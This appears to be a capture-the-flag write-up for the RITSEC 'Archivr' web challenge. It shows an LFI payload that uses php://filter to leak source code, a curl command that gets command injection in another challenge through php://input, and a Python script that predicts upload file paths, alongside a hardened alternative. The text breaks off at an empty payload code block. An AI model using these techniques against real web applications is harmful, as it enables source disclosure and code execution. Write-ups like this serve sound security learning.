# Archivr 300
My team solved all the other web challenges. This was the only one left.
We did not solve this challenge during the CTF because I'm stupid and forgot how regex works :))))))).
Anyway, I think it will make for a good writeup. Enjoy.
![alt text](1.png "Chall")
## Recon
![alt text](2.png "Upload")
We can upload any file we want. Let's try uploading `shell.php`.
![alt text](4.png "Download")
The extension gets removed and replaced with .dat.
![alt text](3.png "Download")
We can download the file here if we enter `1542616333.dat`.
Okay, let's try some more extensions and figure out which ones are useful.
![alt text](5.png "Download")
Left side is the upload filename, right side is the filename returned by the server.
Moving on. Not much else to do here, as the file is just returned to us and not displayed.
## Dirb
Running dirb, we find some new paths.
![alt text](6.png "Download")
Cool, we have found the upload directory. Let's see if we can browse our file.
```
/uploads/1542616333.dat (404)
```
Okay maybe that's not the correct folder.
## Exploiting LFI Wrappers
Using this payload we can view the source code of `upload.php`, since the `page` parameter is not sanitized correctly before it is used.
`http://fun.ritsec.club:8004/index.php?page=php://filter/convert.base64-encode/resource=upload`
![alt text](11.png "Download")
Decoding the base64 we get:
![alt text](7.png "Download")
This is the code for the download page:
![alt text](8.png "Download")
So the path an uploaded file is stored at is
```
uploads/md5(REMOTE_ADDR)/md5(time()).ext
```
## The hunt for the REMOTE_ADDR IP
In PHP, `$_SERVER['REMOTE_ADDR']` returns the IP address (in the form X.X.X.X) of the user visiting the website.
What's different in this challenge is that the server is (most likely) running inside Docker and behind a reverse proxy.
![alt text](apache404.png "Download")
If we visit a page that does not exist, we see that the web server is running Apache.
![alt text](nginx.png "Download")
But if we look at the response headers, they say nginx.
```
me ---> nginx (port 8003) ----> apache (port 80)
```
Let's try some obvious IPs:
```
127.0.0.1
my remote ip
0.0.0.0
54.166.0.85 (ip of ritsec website)
```
None of these worked. Brute force is not an option, as we don't know which range the IP is in.
### Wild idea: Spoofing The X-Forwarded-For (XFF) HTTP header field
I tried adding a header field with a custom IP to see if we could spoof the remote address. This did not work, and I never expected it to.
```
X-Forwarded-For: 127.0.0.1
```
### Thinking outside the box: Exploiting another challenge
Remember how we had command injection in Lazy Dev? The setup of the CTF challenges should be very similar.
```
curl -d "" -X POST http://fun.ritsec.club:8007/devsrule.php?magic=php://input
```
![alt text](9.png "Download")
Remote address of lazy dev is `10.0.10.254`.
Maybe it's the same for Archivr.
![alt text](10.png "Download")
Yay! We've found something. Instead of a 404 we get a 403 Forbidden.
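The naming scheme recovered from `upload.php` and the internal address found via Lazy Dev are enough to recompute where a file lands. The following Python script is an added example, not code from the writeup or the challenge: it derives the stored path from the scheme above, shows why the returned filename (the raw timestamp) makes that path guessable, and contrasts it with a random name generated from a CSPRNG (my own assumption of a fix, not the challenge's code).

```python
import hashlib
import secrets

# Naming scheme recovered from upload.php (see the LFI section):
#   uploads/md5(REMOTE_ADDR)/md5(time()).ext
# PHP's md5() hashes the string form of its argument, so time() is
# hashed as the same decimal digits the server echoes back as the filename.

def stored_path(remote_addr: str, timestamp: int, ext: str = "dat") -> str:
    """Path under the web root where upload.php keeps a file, per the scheme above."""
    dir_part = hashlib.md5(remote_addr.encode()).hexdigest()
    file_part = hashlib.md5(str(timestamp).encode()).hexdigest()
    return f"uploads/{dir_part}/{file_part}.{ext}"

def inputs_are_guessable(returned_name: str) -> bool:
    """The name handed back to the uploader (e.g. '1542616333.dat') is the raw
    timestamp, so every input to the scheme except REMOTE_ADDR is visible to the
    client, and REMOTE_ADDR is a fixed infrastructure value, not a secret."""
    stem = returned_name.rsplit(".", 1)[0]
    return stem.isdigit()

def hardened_path(ext: str = "dat") -> str:
    """Defensive alternative (assumption, not the challenge's code): a name drawn
    from the CSPRNG cannot be derived from anything the client sees or controls."""
    return f"uploads/{secrets.token_hex(16)}.{ext}"

if __name__ == "__main__":
    # Values from the writeup: internal address seen via Lazy Dev,
    # timestamp taken from the filename the server returned.
    print(stored_path("10.0.10.254", 1542616333))
    print(inputs_are_guessable("1542616333.dat"))
    print(hardened_path())
```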
## Create a payload
payload.php
```php